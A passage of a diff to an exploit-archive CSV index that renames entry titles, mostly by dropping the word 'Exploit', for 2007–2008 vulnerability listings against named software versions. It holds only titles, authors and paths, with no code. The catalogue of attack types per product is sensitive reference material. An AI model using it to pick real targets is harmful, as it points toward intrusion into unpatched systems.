-4542,platforms/linux/remote/4542.py,"Boa 0.93.15 - HTTP Basic Authentication Bypass Exploit",2007-10-16,ikki,linux,remote,0 +4542,platforms/linux/remote/4542.py,"Boa 0.93.15 - HTTP Basic Authentication Bypass",2007-10-16,ikki,linux,remote,0 4543,platforms/php/webapps/4543.txt,"PHPDJ 0.5 - 'djpage.php' Remote File Inclusion",2007-10-17,GoLd_M,php,webapps,0 4544,platforms/php/webapps/4544.txt,"LimeSurvey 1.52 - (language.php) Remote File Inclusion",2007-10-17,S.W.A.T.,php,webapps,0 4545,platforms/php/webapps/4545.txt,"awzMB 4.2 Beta 1 - Multiple Remote File Inclusion",2007-10-18,S.W.A.T.,php,webapps,0 @@ -4199,7 +4200,7 @@ id,file,description,date,author,platform,type,port 4549,platforms/php/webapps/4549.txt,"PHP Project Management 0.8.10 - Multiple Remote File Inclusion / Local File Inclusion Vulnerabilities",2007-10-21,GoLd_M,php,webapps,0 4550,platforms/php/webapps/4550.pl,"BBPortalS 2.0 - Blind SQL Injection",2007-10-21,Max007,php,webapps,0 4551,platforms/php/webapps/4551.txt,"PeopleAggregator 1.2pre6-release-53 - Multiple Remote File Inclusion",2007-10-21,GoLd_M,php,webapps,0 -4552,platforms/linux/remote/4552.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure Exploit (SSL)",2007-10-21,h3rcul3s,linux,remote,0 +4552,platforms/linux/remote/4552.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure (SSL)",2007-10-21,h3rcul3s,linux,remote,0 4553,platforms/windows/local/4553.php,"PHP 5.x - COM functions Safe_mode and disable_function Bypass",2007-10-22,shinnai,windows,local,0 4554,platforms/php/webapps/4554.txt,"Socketmail 2.2.8 - fnc-readmail3.php Remote File Inclusion",2007-10-22,BiNgZa,php,webapps,0 4555,platforms/php/webapps/4555.txt,"TOWeLS 0.1 - scripture.php Remote File Inclusion",2007-10-22,GoLd_M,php,webapps,0 @@ -4214,13 +4215,13 @@ id,file,description,date,author,platform,type,port 4564,platforms/multiple/local/4564.txt,"Oracle 10g - CTX_DOC.MARKUP SQL Injection",2007-10-23,sh2kerr,multiple,local,0 4565,platforms/php/webapps/4565.txt,"PHP Image 1.2 - Multiple Remote File Inclusion",2007-10-23,Civi,php,webapps,0 4566,platforms/windows/remote/4566.rb,"eIQnetworks ESA SEARCHREPORT - Remote Overflow (Metasploit)",2007-10-24,ri0t,windows,remote,10616 -4567,platforms/multiple/remote/4567.pl,"Jakarta Slide 2.1 RC1 - Remote File Disclosure Exploit",2007-10-24,kingcope,multiple,remote,0 +4567,platforms/multiple/remote/4567.pl,"Jakarta Slide 2.1 RC1 - Remote File Disclosure",2007-10-24,kingcope,multiple,remote,0 4568,platforms/php/webapps/4568.txt,"TikiWiki 1.9.8.1 - Local File Inclusion",2007-10-25,L4teral,php,webapps,0 4569,platforms/windows/dos/4569.pl,"CA BrightStor HSM r11.5 - Remote Stack Based Overflow / Denial of Service",2007-10-27,"Nice Name Crew",windows,dos,0 4570,platforms/multiple/local/4570.pl,"Oracle 10g/11g - SYS.LT.FINDRICSET SQL Injection (1)",2007-10-27,bunker,multiple,local,0 4571,platforms/multiple/local/4571.pl,"Oracle 10g/11g - SYS.LT.FINDRICSET SQL Injection (2)",2007-10-27,bunker,multiple,local,0 4572,platforms/multiple/local/4572.txt,"Oracle 10g - LT.FINDRICSET SQL Injection (IDS evasion)",2007-10-27,sh2kerr,multiple,local,0 -4573,platforms/windows/remote/4573.py,"IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow Exploit",2007-10-27,muts,windows,remote,1581 +4573,platforms/windows/remote/4573.py,"IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow",2007-10-27,muts,windows,remote,1581 4574,platforms/windows/remote/4574.pl,"IBM Lotus Domino 7.0.2FP1 - IMAP4 Server LSUB Command Exploit",2007-10-27,FistFuXXer,windows,remote,143 4575,platforms/php/webapps/4575.txt,"GoSamba 1.0.1 - 'INCLUDE_PATH' Multiple Remote File Inclusion",2007-10-27,GoLd_M,php,webapps,0 4576,platforms/php/webapps/4576.txt,"JobSite Professional 2.0 - file.php SQL Injection",2007-10-28,ZynbER,php,webapps,0 @@ -4236,7 +4237,7 @@ id,file,description,date,author,platform,type,port 4586,platforms/php/webapps/4586.txt,"ProfileCMS 1.0 - Arbitrary File Upload",2007-10-29,r00t@zapak.com,php,webapps,0 4587,platforms/php/webapps/4587.txt,"miniBB 2.1 - (table) SQL Injection",2007-10-30,irk4z,php,webapps,0 4588,platforms/php/webapps/4588.txt,"phpFaber URLInn 2.0.5 - (dir_ws) Remote File Inclusion",2007-10-30,BiNgZa,php,webapps,0 -4589,platforms/php/webapps/4589.htm,"PHP-AGTC membership system 1.1a - Remote Add Admin Exploit",2007-10-30,0x90,php,webapps,0 +4589,platforms/php/webapps/4589.htm,"PHP-AGTC membership system 1.1a - Remote Add Admin",2007-10-30,0x90,php,webapps,0 4591,platforms/php/webapps/4591.txt,"ModuleBuilder 1.0 - (file) Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0 4592,platforms/php/webapps/4592.txt,"ISPworker 1.21 - download.php Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0 4593,platforms/php/webapps/4593.txt,"WordPress Plugin BackUpWordPress 0.4.2b - Remote File Inclusion",2007-11-01,S.W.A.T.,php,webapps,0 @@ -4270,7 +4271,7 @@ id,file,description,date,author,platform,type,port 4621,platforms/php/webapps/4621.txt,"patBBcode 1.0 - bbcodeSource.php Remote File Inclusion",2007-11-12,p4sswd,php,webapps,0 4622,platforms/php/webapps/4622.txt,"Myspace Clone Script - SQL Injection",2007-11-13,t0pP8uZz,php,webapps,0 4623,platforms/php/webapps/4623.txt,"Toko Instan 7.6 - Multiple SQL Injections",2007-11-14,k1tk4t,php,webapps,0 -4624,platforms/osx/dos/4624.c,"Apple Mac OS X 10.4.x - Kernel i386_set_ldt() Integer Overflow (PoC)",2007-11-16,"RISE Security",osx,dos,0 +4624,platforms/osx/dos/4624.c,"Apple Mac OSX 10.4.x - Kernel i386_set_ldt() Integer Overflow (PoC)",2007-11-16,"RISE Security",osx,dos,0 4625,platforms/windows/local/4625.txt,"Microsoft Jet Engine - '.MDB' File Parsing Stack Overflow (PoC)",2007-11-16,cocoruder,windows,local,0 4626,platforms/php/webapps/4626.txt,"Joomla Component Carousel Flash Image Gallery - Remote File Inclusion",2007-11-16,Crackers_Child,php,webapps,0 4627,platforms/php/webapps/4627.txt,"ProfileCMS 1.0 - 'id' SQL Injection",2007-11-16,K-159,php,webapps,0 @@ -4285,16 +4286,16 @@ id,file,description,date,author,platform,type,port 4636,platforms/php/webapps/4636.txt,"joomla Component juser 1.0.14 - Remote File Inclusion",2007-11-19,NoGe,php,webapps,0 4637,platforms/php/webapps/4637.txt,"bcoos 1.0.10 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2007-11-20,BugReport.IR,php,webapps,0 4638,platforms/php/webapps/4638.txt,"skyportal vrc6 - Multiple Vulnerabilities",2007-11-20,BugReport.IR,php,webapps,0 -4639,platforms/php/webapps/4639.htm,"Ucms 1.8 - Backdoor Remote Command Execution Exploit",2007-11-21,D4m14n,php,webapps,0 +4639,platforms/php/webapps/4639.htm,"Ucms 1.8 - Backdoor Remote Command Execution",2007-11-21,D4m14n,php,webapps,0 4640,platforms/php/webapps/4640.txt,"TalkBack 2.2.7 - Multiple Remote File Inclusion",2007-11-21,NoGe,php,webapps,0 4641,platforms/php/webapps/4641.txt,"Alstrasoft e-Friends 4.98 - (seid) Multiple SQL Injection",2007-11-21,K-159,php,webapps,0 4642,platforms/php/webapps/4642.txt,"DevMass Shopping Cart 1.0 - Remote File Inclusion",2007-11-22,S.W.A.T.,php,webapps,0 -4643,platforms/php/webapps/4643.py,"VigileCMS 1.8 - Stealth Remote Command Execution Exploit",2007-11-22,The:Paradox,php,webapps,0 +4643,platforms/php/webapps/4643.py,"VigileCMS 1.8 - Stealth Remote Command Execution",2007-11-22,The:Paradox,php,webapps,0 4644,platforms/asp/webapps/4644.txt,"NetAuctionHelp 4.1 - (nsearch) SQL Injection",2007-11-22,"Aria-Security Team",asp,webapps,0 4645,platforms/php/webapps/4645.txt,"Content Injector 1.52 - (index.php cat) SQL Injection",2007-11-22,S.W.A.T.,php,webapps,0 4646,platforms/php/webapps/4646.pl,"PHPKIT 1.6.4pl1 - article.php SQL Injection",2007-11-22,Shadowleet,php,webapps,0 4647,platforms/cgi/webapps/4647.txt,"KB-Bestellsystem - 'kb_whois.cgi' Command Execution",2007-11-22,"Zero X",cgi,webapps,0 -4648,platforms/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 - RTSP Response Remote SEH Overwrite (PoC)",2007-11-23,h07,multiple,dos,0 +4648,platforms/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH) (PoC)",2007-11-23,h07,multiple,dos,0 4649,platforms/php/webapps/4649.txt,"Irola My-Time 3.5 - SQL Injection",2007-11-23,"Aria-Security Team",php,webapps,0 4650,platforms/php/webapps/4650.txt,"Mp3 ToolBox 1.0 Beta 5 - (skin_file) Remote File Inclusion",2007-11-23,Crackers_Child,php,webapps,0 4651,platforms/windows/remote/4651.cpp,"Apple QuickTime 7.2/7.3 - RSTP Response Code Execution (Vista/XP)",2007-11-24,InTeL,windows,remote,0 @@ -4319,7 +4320,7 @@ id,file,description,date,author,platform,type,port 4670,platforms/php/webapps/4670.txt,"PHP-CON 1.3 - (include.php) Remote File Inclusion",2007-11-28,GoLd_M,php,webapps,0 4671,platforms/php/webapps/4671.txt,"EHCP 0.22.8 - Multiple Remote File Inclusion",2007-11-28,MhZ91,php,webapps,0 4672,platforms/php/webapps/4672.txt,"Charrays CMS 0.9.3 - Multiple Remote File Inclusion",2007-11-28,MhZ91,php,webapps,0 -4673,platforms/multiple/remote/4673.rb,"Apple QuickTime 7.2/7.3 (OS X/Windows) - RSTP Response Universal Exploit",2007-11-29,"Subreption LLC.",multiple,remote,0 +4673,platforms/multiple/remote/4673.rb,"Apple QuickTime 7.2/7.3 (OSX/Windows) - RSTP Response Universal Exploit",2007-11-29,"Subreption LLC.",multiple,remote,0 4674,platforms/php/webapps/4674.txt,"TuMusika Evolution 1.7R5 - Remote File Disclosure",2007-11-28,GoLd_M,php,webapps,0 4675,platforms/php/webapps/4675.txt,"NoAh 0.9 pre 1.2 - (filepath) Remote File Disclosure",2007-11-28,GoLd_M,php,webapps,0 4676,platforms/php/webapps/4676.txt,"Web-MeetMe 3.0.3 - (play.php) Remote File Disclosure",2007-11-29,Evil.Man,php,webapps,0 @@ -4335,8 +4336,8 @@ id,file,description,date,author,platform,type,port 4686,platforms/php/webapps/4686.txt,"phpBB Garage 1.2.0 Beta3 - SQL Injection",2007-12-03,maku234,php,webapps,0 4687,platforms/asp/webapps/4687.htm,"Snitz Forums 2000 - Active.asp SQL Injection",2007-12-03,BugReport.IR,asp,webapps,0 4688,platforms/windows/dos/4688.html,"VLC 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization (PoC)",2007-12-04,"Ricardo Narvaja",windows,dos,0 -4689,platforms/osx/dos/4689.c,"Apple Mac OS X xnu 1228.0 - mach-o Local Kernel Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0 -4690,platforms/osx/dos/4690.c,"Apple Mac OS X 10.5.0 (Leopard) - vpnd Remote Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0 +4689,platforms/osx/dos/4689.c,"Apple Mac OSX xnu 1228.0 - mach-o Local Kernel Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0 +4690,platforms/osx/dos/4690.c,"Apple Mac OSX 10.5.0 (Leopard) - vpnd Remote Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0 4691,platforms/php/webapps/4691.txt,"Mambo/Joomla Component rsgallery 2.0b5 - 'catid' SQL Injection",2007-12-05,K-159,php,webapps,0 4692,platforms/hardware/dos/4692.pl,"Cisco Phone 7940 - Remote Denial of Service",2007-12-05,MADYNES,hardware,dos,0 4693,platforms/php/webapps/4693.txt,"SineCMS 2.3.4 - Calendar SQL Injection",2007-12-05,KiNgOfThEwOrLd,php,webapps,0 @@ -4369,15 +4370,15 @@ id,file,description,date,author,platform,type,port 4720,platforms/windows/remote/4720.html,"HP Compaq Notebooks - ActiveX Remote Code Execution",2007-12-11,porkythepig,windows,remote,0 4721,platforms/php/webapps/4721.txt,"WordPress 2.3.1 - Charset SQL Injection",2007-12-11,"Abel Cheung",php,webapps,0 4722,platforms/php/webapps/4722.txt,"viart cms/shop/helpdesk 3.3.2 - Remote File Inclusion",2007-12-11,RoMaNcYxHaCkEr,php,webapps,0 -4723,platforms/osx/dos/4723.c,"Apple Mac OS X xnu 1228.0 - super_blob Local kernel Denial of Service (PoC)",2007-12-12,mu-b,osx,dos,0 -4724,platforms/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 - CGI Remote Buffer Overflow Exploit",2007-12-12,muts,windows,remote,80 +4723,platforms/osx/dos/4723.c,"Apple Mac OSX xnu 1228.0 - super_blob Local kernel Denial of Service (PoC)",2007-12-12,mu-b,osx,dos,0 +4724,platforms/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 - CGI Remote Buffer Overflow",2007-12-12,muts,windows,remote,80 4725,platforms/php/webapps/4725.txt,"Fastpublish CMS 1.9999 - config[fsBase] Remote File Inclusion",2007-12-12,RoMaNcYxHaCkEr,php,webapps,0 4726,platforms/php/webapps/4726.txt,"CityWriter 0.9.7 - head.php Remote File Inclusion",2007-12-13,RoMaNcYxHaCkEr,php,webapps,0 4727,platforms/php/webapps/4727.txt,"CMS Galaxie Software - (category_id) SQL Injection",2007-12-13,MurderSkillz,php,webapps,0 4728,platforms/php/webapps/4728.txt,"Mms Gallery PHP 1.0 - 'id' Remote File Disclosure",2007-12-13,GoLd_M,php,webapps,0 4729,platforms/php/webapps/4729.txt,"xml2owl 0.1.1 - (filedownload.php) Remote File Disclosure",2007-12-13,GoLd_M,php,webapps,0 4730,platforms/asp/webapps/4730.txt,"hosting controller 6.1 hot fix 3.3 - Multiple Vulnerabilities",2007-12-13,BugReport.IR,asp,webapps,0 -4731,platforms/php/webapps/4731.php,"Adult Script 1.6 - Unauthorized Administrative Access Exploit",2007-12-13,Liz0ziM,php,webapps,0 +4731,platforms/php/webapps/4731.php,"Adult Script 1.6 - Unauthorized Administrative Access",2007-12-13,Liz0ziM,php,webapps,0 4732,platforms/linux/dos/4732.c,"Samba 3.0.27a - send_mailslot() Remote Buffer Overflow (PoC)",2007-12-14,x86,linux,dos,0 4733,platforms/php/webapps/4733.txt,"123tkShop 0.9.1 - Remote Authentication Bypass",2007-12-14,"Michael Brooks",php,webapps,0 4734,platforms/php/webapps/4734.txt,"Anon Proxy Server 0.1000 - Remote Command Execution",2007-12-14,"Michael Brooks",php,webapps,0 @@ -4387,13 +4388,13 @@ id,file,description,date,author,platform,type,port 4738,platforms/php/webapps/4738.txt,"gf-3xplorer 2.4 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2007-12-18,MhZ91,php,webapps,0 4739,platforms/php/webapps/4739.pl,"MOG-WebShop - 'index.php group' SQL Injection",2007-12-18,k1tk4t,php,webapps,0 4740,platforms/php/webapps/4740.pl,"FreeWebShop 2.2.1 - Blind SQL Injection",2007-12-18,k1tk4t,php,webapps,0 -4741,platforms/php/webapps/4741.txt,"MySpace Content Zone 3.x - Remote File Upload",2007-12-18,Don,php,webapps,0 +4741,platforms/php/webapps/4741.txt,"MySpace Content Zone 3.x - Arbitrary File Upload",2007-12-18,Don,php,webapps,0 4742,platforms/windows/dos/4742.py,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow (PoC)",2007-12-18,r4x,windows,dos,0 4743,platforms/php/webapps/4743.pl,"FreeWebShop 2.2.7 - 'cookie' Admin Password Grabber Exploit",2007-12-18,k1tk4t,php,webapps,0 4744,platforms/hardware/remote/4744.txt,"rooter VDSL Device - (Goahead WebServer) Disclosure",2007-12-18,NeoCoderz,hardware,remote,0 -4745,platforms/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow Exploit (MS07-065)",2007-12-18,axis,windows,remote,0 +4745,platforms/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065)",2007-12-18,axis,windows,remote,0 4746,platforms/windows/remote/4746.html,"RavWare Software - '.MAS' Flic Control Remote Buffer Overflow",2007-12-18,shinnai,windows,remote,0 -4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - (ulang) Remote Command Execution Exploit",2007-12-18,rgod,windows,remote,0 +4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - (ulang) Remote Command Execution",2007-12-18,rgod,windows,remote,0 4748,platforms/windows/dos/4748.php,"Surgemail 38k4 - webmail Host header Denial of Service",2007-12-18,rgod,windows,dos,0 4749,platforms/windows/local/4749.c,"Rosoft Media Player 4.1.7 - '.m3u' Stack Overflow",2007-12-18,devcode,windows,local,0 4750,platforms/php/webapps/4750.txt,"PHPMyRealty 1.0.x - (search.php type) SQL Injection",2007-12-18,Koller,php,webapps,0 @@ -4404,7 +4405,7 @@ id,file,description,date,author,platform,type,port 4756,platforms/linux/local/4756.c,"Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation",2007-12-18,Backdoored,linux,local,0 4757,platforms/windows/dos/4757.txt,"hp software update client 3.0.8.4 - Multiple Vulnerabilities",2007-12-19,porkythepig,windows,dos,0 4758,platforms/php/webapps/4758.txt,"xeCMS 1.x - (view.php list) Remote File Disclosure",2007-12-19,p4imi0,php,webapps,0 -4759,platforms/osx/local/4759.c,"Apple Mac OS X - mount_smbfs Stack Based Buffer Overflow",2007-12-19,"Subreption LLC.",osx,local,0 +4759,platforms/osx/local/4759.c,"Apple Mac OSX - mount_smbfs Stack Based Buffer Overflow",2007-12-19,"Subreption LLC.",osx,local,0 4760,platforms/windows/remote/4760.txt,"Microsoft Windows 2000 - AS SP4 Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0 4761,platforms/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Root Exploit",2007-12-21,eliteboy,multiple,remote,25 4762,platforms/php/webapps/4762.txt,"nicLOR CMS - 'sezione_news.php' SQL Injection",2007-12-21,x0kster,php,webapps,0 @@ -4413,12 +4414,12 @@ id,file,description,date,author,platform,type,port 4765,platforms/php/webapps/4765.txt,"1024 CMS 1.3.1 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2007-12-21,irk4z,php,webapps,0 4766,platforms/php/webapps/4766.txt,"mBlog 1.2 - (page) Remote File Disclosure",2007-12-21,irk4z,php,webapps,0 4767,platforms/php/webapps/4767.txt,"Social Engine 2.0 - Multiple Local File Inclusion",2007-12-21,MhZ91,php,webapps,0 -4768,platforms/php/webapps/4768.py,"Shadowed Portal 5.7d3 - Remote Command Execution Exploit",2007-12-21,The:Paradox,php,webapps,0 +4768,platforms/php/webapps/4768.py,"Shadowed Portal 5.7d3 - Remote Command Execution",2007-12-21,The:Paradox,php,webapps,0 4769,platforms/php/webapps/4769.txt,"Shadowed Portal 5.7d3 - (POST) Remote File Inclusion",2007-12-21,The:Paradox,php,webapps,0 4770,platforms/php/webapps/4770.txt,"Wallpaper Site 1.0.09 - (category.php) SQL Injection",2007-12-22,Koller,php,webapps,0 4771,platforms/php/webapps/4771.txt,"Ip Reg 0.3 - Multiple SQL Injections",2007-12-22,MhZ91,php,webapps,0 4772,platforms/php/webapps/4772.txt,"zBlog 1.2 - SQL Injection",2007-12-22,Houssamix,php,webapps,0 -4773,platforms/multiple/dos/4773.pl,"OpenSSL < 0.9.7l / 0.9.8d - SSLv2 Client Crash Exploit",2007-12-23,"Noam Rathaus",multiple,dos,0 +4773,platforms/multiple/dos/4773.pl,"OpenSSL < 0.9.7l / 0.9.8d - SSLv2 Client Crash",2007-12-23,"Noam Rathaus",multiple,dos,0 4774,platforms/php/webapps/4774.pl,"PHP ZLink 0.3 - (go.php) SQL Injection",2007-12-23,DNX,php,webapps,0 4775,platforms/php/webapps/4775.txt,"Adult Script 1.6.5 - Multiple SQL Injections",2007-12-23,MhZ91,php,webapps,0 4776,platforms/php/webapps/4776.txt,"MMSLamp - (idpro) SQL Injection",2007-12-23,x0kster,php,webapps,0 @@ -4434,7 +4435,7 @@ id,file,description,date,author,platform,type,port 4786,platforms/php/webapps/4786.pl,"AuraCMS 2.2 - (admin_users.php) Remote Add Administrator Exploit",2007-12-25,k1tk4t,php,webapps,0 4787,platforms/php/webapps/4787.pl,"RunCMS 1.6 - Get Admin Cookie Blind SQL Injection",2007-12-25,sh2kerr,php,webapps,0 4788,platforms/php/webapps/4788.txt,"MailMachine Pro 2.2.4 - SQL Injection",2007-12-25,MhZ91,php,webapps,0 -4789,platforms/php/webapps/4789.php,"PMOS Help Desk 2.4 - Remote Command Execution Exploit",2007-12-25,EgiX,php,webapps,0 +4789,platforms/php/webapps/4789.php,"PMOS Help Desk 2.4 - Remote Command Execution",2007-12-25,EgiX,php,webapps,0 4790,platforms/php/webapps/4790.txt,"runcms 1.6 - Multiple Vulnerabilities",2007-12-25,DSecRG,php,webapps,0 4791,platforms/php/webapps/4791.txt,"eSyndiCat Link Exchange Script 2005-2006 - SQL Injection",2007-12-25,EgiX,php,webapps,0 4792,platforms/php/webapps/4792.pl,"RunCMS 1.6 - Blind SQL Injection (IDS evasion)",2007-12-26,sh2kerr,php,webapps,0 @@ -4442,7 +4443,7 @@ id,file,description,date,author,platform,type,port 4794,platforms/php/webapps/4794.pl,"XZero Community Classifieds 4.95.11 - Local File Inclusion / SQL Injection",2007-12-26,Kw3[R]Ln,php,webapps,0 4795,platforms/php/webapps/4795.txt,"XZero Community Classifieds 4.95.11 - Remote File Inclusion",2007-12-26,Kw3[R]Ln,php,webapps,0 4796,platforms/php/webapps/4796.txt,"PNPHPBB2 <= 1.2i - (printview.php PHPEx) Local File Inclusion",2007-12-26,irk4z,php,webapps,0 -4797,platforms/hardware/remote/4797.pl,"March Networks DVR 3204 - Logfile Information Disclosure Exploit",2007-12-27,"Alex Hernandez",hardware,remote,0 +4797,platforms/hardware/remote/4797.pl,"March Networks DVR 3204 - Logfile Information Disclosure",2007-12-27,"Alex Hernandez",hardware,remote,0 4798,platforms/php/webapps/4798.php,"ZeusCMS 0.3 - Blind SQL Injection",2007-12-27,EgiX,php,webapps,0 4799,platforms/php/webapps/4799.txt,"Joovili 3.0.6 - (joovili.images.php) Remote File Disclosure",2007-12-27,EcHoLL,php,webapps,0 4800,platforms/php/webapps/4800.txt,"xml2owl 0.1.1 - showcode.php Remote Command Execution",2007-12-28,MhZ91,php,webapps,0 @@ -4457,19 +4458,19 @@ id,file,description,date,author,platform,type,port 4810,platforms/php/webapps/4810.txt,"CMS Made Simple 1.2.2 - (TinyMCE module) SQL Injection",2007-12-30,EgiX,php,webapps,0 4811,platforms/php/webapps/4811.txt,"kontakt formular 1.4 - Remote File Inclusion",2007-12-30,bd0rk,php,webapps,0 4812,platforms/php/webapps/4812.txt,"Mihalism Multi Host 2.0.7 - download.php Remote File Disclosure",2007-12-30,GoLd_M,php,webapps,0 -4813,platforms/php/webapps/4813.txt,"XCMS 1.83 - Remote Command Execution Exploit",2007-12-30,x0kster,php,webapps,0 -4814,platforms/php/webapps/4814.txt,"Bitweaver R2 CMS - Remote File Upload / Disclosure",2007-12-30,BugReport.IR,php,webapps,0 +4813,platforms/php/webapps/4813.txt,"XCMS 1.83 - Remote Command Execution",2007-12-30,x0kster,php,webapps,0 +4814,platforms/php/webapps/4814.txt,"Bitweaver R2 CMS - Arbitrary File Upload / Disclosure",2007-12-30,BugReport.IR,php,webapps,0 4815,platforms/php/webapps/4815.txt,"matpo bilder galerie 1.1 - Remote File Inclusion",2007-12-30,Crackers_Child,php,webapps,0 4816,platforms/php/webapps/4816.txt,"SanyBee Gallery 0.1.1 - (p) Local File Inclusion",2007-12-30,jackal,php,webapps,0 4817,platforms/php/webapps/4817.txt,"w-Agora 4.2.1 - (cat) SQL Injection",2007-12-30,IHTeam,php,webapps,0 -4818,platforms/windows/remote/4818.html,"IBM Domino Web Access Upload Module - inotes6.dll Buffer Overflow Exploit",2007-12-30,Elazar,windows,remote,0 -4819,platforms/windows/remote/4819.html,"Macrovision Installshield - isusweb.dll SEH Overwrite",2007-12-30,Elazar,windows,remote,0 -4820,platforms/windows/remote/4820.html,"IBM Domino Web Access Upload Module - dwa7w.dll Buffer Overflow Exploit",2007-12-30,Elazar,windows,remote,0 +4818,platforms/windows/remote/4818.html,"IBM Domino Web Access Upload Module - inotes6.dll Buffer Overflow",2007-12-30,Elazar,windows,remote,0 +4819,platforms/windows/remote/4819.html,"Macrovision Installshield - isusweb.dll Overwrite (SEH)",2007-12-30,Elazar,windows,remote,0 +4820,platforms/windows/remote/4820.html,"IBM Domino Web Access Upload Module - dwa7w.dll Buffer Overflow",2007-12-30,Elazar,windows,remote,0 4821,platforms/php/webapps/4821.txt,"IPTBB 0.5.4 - (viewdir id) SQL Injection",2007-12-31,MhZ91,php,webapps,0 4822,platforms/php/webapps/4822.txt,"MyPHP Forum 3.0 - (Final) Multiple SQL Injection",2007-12-31,x0kster,php,webapps,0 4823,platforms/php/webapps/4823.pl,"ZenPhoto 1.1.3 - (rss.php albumnr) SQL Injection",2007-12-31,Silentz,php,webapps,0 4824,platforms/asp/webapps/4824.py,"oneSCHOOL - admin/login.asp SQL Injection",2007-12-31,Guga360,asp,webapps,0 -4825,platforms/windows/remote/4825.html,"Vantage Linguistics AnswerWorks 4 - API ActiveX Control Buffer Overflow Exploit",2007-12-31,Elazar,windows,remote,0 +4825,platforms/windows/remote/4825.html,"Vantage Linguistics AnswerWorks 4 - API ActiveX Control Buffer Overflow",2007-12-31,Elazar,windows,remote,0 4826,platforms/php/webapps/4826.pl,"WebPortal CMS 0.6.0 - (index.php m) SQL Injection",2007-12-31,x0kster,php,webapps,0 4827,platforms/php/webapps/4827.txt,"Joomla Component PU Arcade 2.1.3 - SQL Injection",2007-12-31,Houssamix,php,webapps,0 4828,platforms/php/webapps/4828.txt,"AGENCY4NET WEBFTP 1 - download2.php File Disclosure",2008-01-01,GoLd_M,php,webapps,0 @@ -4488,7 +4489,7 @@ id,file,description,date,author,platform,type,port 4841,platforms/php/webapps/4841.txt,"Invision Power Board 2.1.7 - ACTIVE Cross-Site Scripting / SQL Injection",2008-01-05,"Eugene Minaev",php,webapps,0 4842,platforms/php/webapps/4842.pl,"NetRisk 1.9.7 - (change_submit.php) Remote Password Change Exploit",2008-01-05,Cod3rZ,php,webapps,0 4843,platforms/php/webapps/4843.txt,"modx CMS 0.9.6.1 - Multiple Vulnerabilities",2008-01-05,BugReport.IR,php,webapps,0 -4844,platforms/php/webapps/4844.txt,"WordPress Plugin Wp-FileManager 1.2 - Remote Upload",2008-01-06,Houssamix,php,webapps,0 +4844,platforms/php/webapps/4844.txt,"WordPress Plugin Wp-FileManager 1.2 - Arbitrary File Upload",2008-01-06,Houssamix,php,webapps,0 4845,platforms/php/webapps/4845.pl,"RunCMS Newbb_plus 0.92 - Client IP SQL Injection",2008-01-06,"Eugene Minaev",php,webapps,0 4846,platforms/php/webapps/4846.txt,"Uebimiau Web-Mail 2.7.10/2.7.2 - Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps,0 4847,platforms/php/webapps/4847.txt,"XOOPS mod_gallery Zend_Hash_key + Extract - Remote File Inclusion",2008-01-06,"Eugene Minaev",php,webapps,0 @@ -4503,28 +4504,28 @@ id,file,description,date,author,platform,type,port 4856,platforms/multiple/dos/4856.php,"Half-Life CSTRIKE Server 1.6 - Denial of Service (no-steam)",2008-01-06,"Eugene Minaev",multiple,dos,0 4857,platforms/php/webapps/4857.txt,"OneCMS 2.4 - SQL Injection / Upload",2008-01-07,BugReport.IR,php,webapps,0 4858,platforms/php/webapps/4858.pl,"FlexBB 0.6.3 - Cookies SQL Injection",2008-01-07,"Eugene Minaev",php,webapps,0 -4859,platforms/php/webapps/4859.txt,"EkinBoard 1.1.0 - Remote File Upload / Authentication Bypass",2008-01-07,"Eugene Minaev",php,webapps,0 +4859,platforms/php/webapps/4859.txt,"EkinBoard 1.1.0 - Arbitrary File Upload / Authentication Bypass",2008-01-07,"Eugene Minaev",php,webapps,0 4860,platforms/php/webapps/4860.pl,"Eggblog 3.1.0 - Cookies SQL Injection",2008-01-07,"Eugene Minaev",php,webapps,0 4861,platforms/php/webapps/4861.txt,"TUTOS 1.3 - (cmd.php) Remote Command Execution",2008-01-07,Houssamix,php,webapps,0 4862,platforms/linux/remote/4862.py,"ClamAV 0.91.2 - libclamav MEW PE Buffer Overflow",2008-01-07,"Thomas Pollet",linux,remote,0 4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 - Pass Recovery SQL Injection",2008-01-08,"Eugene Minaev",php,webapps,0 -4864,platforms/php/webapps/4864.txt,"Zero CMS 1.0 - Alpha Arbitrary File Upload / SQL Injection",2008-01-08,KiNgOfThEwOrLd,php,webapps,0 +4864,platforms/php/webapps/4864.txt,"Zero CMS 1.0 Alpha - Arbitrary File Upload / SQL Injection",2008-01-08,KiNgOfThEwOrLd,php,webapps,0 4865,platforms/php/webapps/4865.txt,"evilboard 0.1a - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-01-08,seaofglass,php,webapps,0 4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing - Remote Stack Overflow",2008-01-08,ryujin,windows,remote,0 4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 - (id_actividad) SQL 